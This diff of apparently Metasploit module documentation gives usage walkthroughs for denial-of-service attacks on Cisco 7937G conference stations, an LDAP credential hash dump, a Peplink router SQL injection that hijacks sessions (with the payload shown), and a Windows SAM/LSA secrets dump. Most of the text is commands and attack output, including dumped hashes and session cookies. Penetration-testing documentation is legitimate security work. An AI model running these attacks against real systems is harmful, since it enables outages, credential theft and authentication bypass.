+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+#### Successful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 -     self._parse_kex_init(m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 -     raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - 
+[*] 192.168.110.209 - dos non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+#### Successful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 -     self._parse_kex_init(m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 -     raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - 
+[*] 192.168.110.209 - dos non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a bug in how the conference station handles executing a ping via its web interface.
+  By repeatedly executing the ping function without clearing out the resulting output,
+  a DoS is caused that will reset the device after a few minutes.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access on the device (default configuration).
+  3. Start msfconsole
+  4. Do: `use auxiliary/dos/cisco/cisco_7937g_dos_reboot`
+  5. Do: `set rhost 192.168.1.10`
+  6. Do: `run`
+  7. The conference station should become nonresponsive and then power cycle itself.
+
+## Options
+
+  No options
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Sending DoS Packets. Stand by.
+[*] 192.168.110.209 - DoS reset attack completed!
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Sending DoS Packets. Stand by.
+[*] 192.168.110.209 - DoS reset attack completed!
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an LDAP connection to dump data from LDAP server
+using an anonymous or authenticated bind.
+Searching for specific attributes it collects user credentials.
+
+### Setup
+
+Tested in the wild.
+
+You may eventually setup an intentionally insecure OpenLDAP server in docker.
+The below OpenLDAP server does not have any ACL, therefore the hashPassword
+attributes are readable by anonymous clients.
+
+```
+$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
+$ cd bitnami-docker-openldap
+$ docker-compose up -d
+Creating bitnami-docker-openldap_openldap_1 ... done
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
+RPORT => 1389
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   BIND_DN                     no        The username to authenticate to LDAP server
+   BIND_PW                     no        Password for the BIND_DN
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      1389             yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) >
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against 127.0.0.1
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=example,dc=org
+[*] Dumping LDAP data from server at 127.0.0.1:1389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
+[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the LDAP server.
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USER_ATTR
+
+LDAP attribute to take the user name from. Defaults to DN, however you may
+wish to change it UID, name or similar.
+
+### PASS_ATTR
+
+LDAP attribute to take the password hash from. Defaults to userPassword,
+some LDAP server may use different attribute, e.g. unixUserPassword,
+sambantpassword, sambalmpassword.
+
+## Scenarios
+
+### Avaya Communication Manager via anonymous bind
+
+```
+msf5 > use auxiliary/gather/ldap_hashdump
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      389              yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
+[*] Searching for attribute: userPassword
+[*] Taking uid attribute as username
+[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+```
+
+### NASDeluxe - NAS with Samba LM/NTLM hashes
+
+```
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
+PASS_ATTR => sambantpassword
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
+[*] Searching for attribute: sambantpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
+[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
+[*] Auxiliary module execution completed
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
+[*] Searching for attribute: sambalmpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
+[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,430 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits an SQLi vulnerability in the web interface of Peplink
+routers running outdated firmware (confirmed on version 7.0.0-build1904 and below).
+
+The vulnerability is due to the lack of sanitization applied to the bauth cookie,
+Successful exploitation of the vulnerability allows unauthenticated attackers to get
+into sessions of legitimate users (bypassing authentication).
+
+Exploitation of this vulnerability requires that there is at least one active user session
+created in the last 4 hours (or session lifetime if it was modified).
+
+## Verification Steps
+
+
+## Options
+
+### BypassLogin
+
+If true, don't retrieve cookies, just use the SQL injection vulnerability to bypass the login
+In the case where expired and non-expired admin sessions exist, might select the expired session if enabled.
+
+### AdminOnly
+
+Only attempt to retrieve cookies of privilegied users (admins)
+
+### EnumPrivs
+
+Retrieve the privilege associated with each session
+
+### EnumUsernames
+
+Retrieve the username associated with each session
+
+### LimitTries
+
+The max number of sessions to try (from most recent), set to avoid checking expired ones needlessly
+
+## Scenarios
+
+Vulnerable firmware downloadable from [here](https://www.peplink.com/support/downloads/archive/).
+It's possible to reproduce the vulnerability without owning a peplink router, using
+[FusionHub](https://www.peplink.com/products/fusionhub/).
+Refer to its installation guide, use a free Solo license.
+
+### Firmware version 6.3.2
+
+BypassLogin:
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
+msf5 auxiliary(gather/peplink_bauth_sqli) > run
+[*] Running module against 192.168.1.254
+
+[+] Target seems to be vulnerable
+[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
+[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkconfigur_203870.bin
+[*] Retrieving fhlicense_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhlicens_829403.txt
+[*] Retrieving sysinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinksysinfo_824042.txt
+[*] Retrieving macinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmacinfo_992224.txt
+[*] Retrieving hostnameinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhostname_183370.txt
+[*] Retrieving uptime
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkuptime_523334.txt
+[*] Retrieving client_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkclient_i_704361.txt
+[*] Retrieving hubport
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhubport_264378.txt
+[*] Retrieving fhstroute
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhstrout_701714.txt
+[*] Retrieving ipsec
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkipsec_664157.txt
+[*] Retrieving wan_summary
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkwan_summ_936160.txt
+[*] Retrieving firewall
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfirewall_270172.txt
+[*] Retrieving cert_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkcert_inf_201536.txt
+[*] Retrieving mvpn_summary
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmvpn_sum_261747.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/peplink_bauth_sqli) >
+```
+
+The config is a .tar.gz archive with an added 36-byte header, you can extract the plaintext config:
+```
+$ dd if=20200802_fshhw1_1135E8A0DD29.conf of=config.tar.gz skip=36 bs=1
+$ tar vxf config.tar.gz
+```
+The config usually includes the admin password in cleartext.
+Note: it's also possible to upload a modified config.
+```
+$ cat config
+ADMIN_HTTPS_ENABLE="yes"
+ADMIN_HTTPS_LANONLY="no"
+ADMIN_HTTPS_PORT="443"
+ADMIN_HTTP_ENABLE="yes"
+ADMIN_HTTP_TO_HTTPS="yes"
+ADMIN_LANONLY="no"
+ADMIN_NAME="admin"
+ADMIN_PASSWORD="mySECUREpassword1"
+ADMIN_PORT="80"
+ADMIN_ROA_PASSWORD="user"
+ADMIN_SESSION_TIMEOUT="14400"
+CONFIG_VERSION="6.0"
+DHCP_SERVER="enable"
+FIREWALL_IDS="yes"
+HOSTNAME="peplink"
+IPSEC_NAT="yes"
+LAN_CONN_METHOD="static"
+LAN_IPADDR="192.168.1.254"
+LAN_NETMASK="255.255.255.0"
+LEFTTIME_USAGE="yes"
+...
+```
+
+EnumPrivs and EnumUsernames:
+
+```
+msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true 
+EnumPrivs => true
+msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true 
+EnumUsernames => true
+msf5 auxiliary(sqli/peplink_bauth_sqli) > run 
+[*] Running module against 192.168.1.254
+
+[+] Target seems vulnerable
+[*] There are 2 (possibly expired) sessions
+[*] Trying the ids from the most recent login
+[+] Found cookie wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8, username = user, with read-only permissions
+[+] Found cookie aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr, username = admin, with read/write permissions
+[*] Checking for admin cookie : wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8
+[*] Checking for admin cookie : aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr
+
+... <as above, gathering of data>
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(sqli/peplink_bauth_sqli) > 
+```
+
+Verbose:
+
+When you enable verbose, you get the parsed XML document displayed.
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > set Verbose true
+msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
+msf5 auxiliary(gather/peplink_bauth_sqli) > run
+[*] Running module against 192.168.1.254
+
+[+] Target seems to be vulnerable
+[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
+[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkconfigur_780974.bin
+[*] Retrieving fhlicense_info
+[+]     data
+[+]             license
+[+]                     bandwidth
+[+]                             0
+[+]                     sessions
+[+]                             0
+[+]                     err_desc
+[+]                             Virtual machine server changed.
+[+]                     force_lic_page
+[+]                             1
+[+]                     activated
+[+]                             0
+[+]                     vm_server_address
+[+]                     expired
+[+]                             0
+[+]                     license_type
+[+]                             Invalid
+[+]                     expiry_date
+[+]                             2021-08-02
+[+]                     sn
+[+]                             1135-E8A0-DD29
+[+]                     license_key
+[+]                             YCB7EAN54FAEMTDF
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhlicens_867800.txt
+[*] Retrieving sysinfo
+[+]     data
+[+]             sysinfo
+[+]                     legal
+[+]                     company
+[+]                             Peplink
+[+]                     mvpn_version
+[+]                             5.0.0
+[+]                     version
+[+]                             6.3.2 build 1424
+[+]                     serial
+[+]                             1135-E8A0-DD29
+[+]                     product_code
+[+]                     hardware_revision
+[+]                             1
+[+]                     desc_support
+[+]                     product_name
+[+]                             Peplink FusionHub
+[+]                     name
+[+]                             1135-E8A0-DD29
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinksysinfo_739792.txt
+[*] Retrieving macinfo
+[+]     data
+[+]             macinfo
+[+]                     port {id=0}
+[+]                             mac
+[+]                                     08:00:27:52:8b:fc
+[+]                             name
+[+]                                     WAN 
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmacinfo_307720.txt
+[*] Retrieving hostnameinfo
+[+]     data
+[+]             hostname_info
+[+]                     hostname
+[+]                             1135-e8a0-dd29
+
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhostname_534719.txt
+[*] Retrieving uptime
+[+]     data
+[+]             subscription_mode
+[+]             systime
+[+]                     Sun Aug 02 14:31:21 CET 2020
+[+]             uptime
+[+]                     elapsed
+[+]                             2986
+[+]                     info
+[+]                             0 days 0 hours 49 minutes
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkuptime_233915.txt
+[*] Retrieving client_info
+[+]     data
+[+]             client_status
+[+]                     reserved_mac
+[+]                     client_list
+[+]                             client {type=0}
+[+]                                     rate_down
+[+]                                             0
+[+]                                     rate_up
+[+]                                             0
+[+]                                     active
+[+]                                     mac
+[+]                                             10:08:B1:CC:97:41
+[+]                                     ip {id=0}
+[+]                                             192.168.1.222
+[+]                                     ipn
+[+]                                             3232235998
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkclient_i_419158.txt
+[*] Retrieving hubport
+[+]     data
+[+]             port {id=wan}
+[+]                     mvpn_advertise_wan_network
+[+]                     tcpmss
+[+]                     mtu
+[+]                             1440
+[+]                     pppoe_sn
+[+]                     pppoe_password
+[+]                     pppoe_user
+[+]                     dns_custom_servers
+[+]                             8.8.8.8 1.1.1.1
+[+]                     dns_auto
+[+]                     dhcp_hostname
+[+]                     dhcp_client_id
+[+]                     mvpn_default_to_lan
+[+]                     gateway
+[+]                             192.168.1.1
+[+]                     netmask
+[+]                             255.255.255.0
+[+]                     ipaddr
+[+]                             192.168.1.254
+[+]                     bridge_mvpn
+[+]                     bridge_mode
+[+]                     conn_method
+[+]                             static
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhubport_064122.txt
+[*] Retrieving fhstroute
+[+]     data
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhstrout_739377.txt
+[*] Retrieving ipsec
+[+]     data
+[+]             ipsec
+[+]                     order
+[+]                     nat
+[+]             linkinfo
+[+]                     link {id=1}
+[+]                             port {id=1}
+[+]                                     port_name
+[+]                                             WAN
+[+]                                     port_type
+[+]                                             ethernet
+[+]                                     actiavted
+[+]                             name
+[+]                                     WAN
+[+]                             enable
+[+]                     order
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkipsec_320666.txt
+[*] Retrieving wan_summary
+[+]     data
+[+]             connection_info
+[+]                     conn {id=1}
+[+]                             conn_method
+[+]                                     method
+[+]                                             dhcp
+[+]                             modem_idle
+[+]                                     timeout
+[+]                                             180
+[+]                             backup_group
+[+]                                     0
+[+]                             mvpn_nat
+[+]                             nat
+[+]                             enable
+[+]                             port_id
+[+]                                     1
+[+]                             name
+[+]                                     WAN
+[+]                     order
+[+]                             1
+[+]             physical_info
+[+]                     port {id=1}
+[+]                             ethernet_info
+[+]                                     simulated_mac
+[+]                                     default_mac
+[+]                                     mac_clone
+[+]                                     mtu
+[+]                                     advertise
+[+]                                     speed
+[+]                             port_name
+[+]                                     WAN 
+[+]                             type
+[+]                                     ethernet
+[+]                             activated
+[+]                                     yes
+[+]                     count
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkwan_summ_918579.txt
+[*] Retrieving firewall
+[+]     data
+[+]             firewall_ids
+[+]             firewall_mvpn
+[+]             private_firewall
+[+]                     default
+[+]                             accept
+[+]             outbound_firewall
+[+]                     default
+[+]                             accept
+[+]             inbound_firewall
+[+]                     default
+[+]                             accept
+[+]             linkinfo
+[+]                     link {id=1}
+[+]                             port {id=1}
+[+]                                     port_name
+[+]                                             WAN
+[+]                                     port_type
+[+]                                             ethernet
+[+]                                     actiavted
+[+]                             name
+[+]                                     WAN
+[+]                             enable
+[+]                     order
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfirewall_758402.txt
+[*] Retrieving cert_info
+[+]     data
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkcert_inf_603637.txt
+[*] Retrieving mvpn_summary
+[+]     data
+[+]             mvpn
+[+]                     order
+[+]                     mvpn_nat_mode_dhcp_server
+[+]                             has_nat_profile
+[+]                                     0
+[+]                             nat_remote
+[+]                                     0
+[+]                             subnet_mask
+[+]                                     24
+[+]                             pool_end
+[+]                                     169.254.131.254
+[+]                             pool_start
+[+]                                     169.254.131.1
+[+]                             enable
+[+]                                     1
+[+]                     restrict_advertise
+[+]                             no
+[+]                     hc_mode
+[+]                             0
+[+]                     rn
+[+]                             1135-E8A0-DD29
+[+]                     site_id
+[+]                             333
+[+]                     l2vpn
+[+]                             wanport_supported
+[+]                                     false
+[+]                             wanport_name
+[+]                                     WAN Port Unavailable
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmvpn_sum_970830.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/peplink_bauth_sqli) > 
+```
+
+Loot:
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > loot
+
+Loot
+====
+
+host           service  type                          name  content             info  path
+----           -------  ----                          ----  -------             ----  ----
+192.168.1.254           peplink configuration tar gz        application/binary        /home/redouane/.msf4/loot/20200802153714_default_192.168.1.254_peplinkconfigur_157106.bin
+192.168.1.254           peplink fhlicense_info              text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhlicens_326973.txt
+192.168.1.254           peplink sysinfo                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinksysinfo_385353.txt
+192.168.1.254           peplink macinfo                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmacinfo_525407.txt
+192.168.1.254           peplink hostnameinfo                text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhostname_613045.txt
+192.168.1.254           peplink uptime                      text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkuptime_488261.txt
+192.168.1.254           peplink client_info                 text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkclient_i_529454.txt
+192.168.1.254           peplink hubport                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhubport_938262.txt
+192.168.1.254           peplink fhstroute                   text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhstrout_737113.txt
+192.168.1.254           peplink ipsec                       text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkipsec_055562.txt
+192.168.1.254           peplink wan_summary                 text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkwan_summ_957693.txt
+192.168.1.254           peplink firewall                    text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfirewall_777226.txt
+192.168.1.254           peplink cert_info                   text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkcert_inf_765605.txt
+192.168.1.254           peplink mvpn_summary                text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmvpn_sum_890141.txt
+
+msf5 auxiliary(gather/peplink_bauth_sqli) > 
+
+```
@@ -0,0 +1,176 @@
+## Vulnerable Application
+### Description
+The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
+(including cached creds) from the remote Windows target without executing any
+agent locally. First, it reads as much data as possible from the registry and
+then save the hives locally on the target (%SYSTEMROOT%\\random.tmp).
+Finally, it downloads the temporary hive files and reads the rest of the data
+from it. These temporary files are removed when it's done.
+
+This modules takes care of starting or enabling the Remote Registry service if
+needed. It will restore the service to its original state when it's done.
+
+This is a port of the great Impacket `secretsdump.py` code written by Alberto
+Solino. Note that the `NTDS.dit` technique has not been implement yet. It will
+be done in a next iteration.
+
+### Setup
+A privileged user is required to run this module, typically a local or domain
+Administrator. It has been tested against multiple Windows versions, from
+Windows XP/Server 2003 to Windows 10/Server version 2004.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/windows_secrets_dump`
+3. Do: `set RHOSTS <target>` (Windows host)
+4. Do: `set SMBUser <username>` (privileged user)
+5. Do: `set SMBDomain <domain name>` (only for domain users)
+6. Do: `set SMBPass <password>`
+7. Do: `run`
+8. You should get the dump result displayed
+9. Do: `hosts`
+10. Verify the host information is there
+11. Do: `services`
+12. Verify the service information is there
+13. Do: `creds`
+14. Verify the dumped credentials are there
+13. Do: `notes`
+14. Verify the notes are there
+
+## Options
+Apart from the standard SMB options, no other specific options are needed.
+
+## Scenarios
+The data shown below has been altered with random data to avoid exposing
+sensitive information.
+
+### Windows 10 Version 1809
+```
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > options
+
+Module options (auxiliary/gather/windows_secrets_dump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as
+
+msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.68.43.12
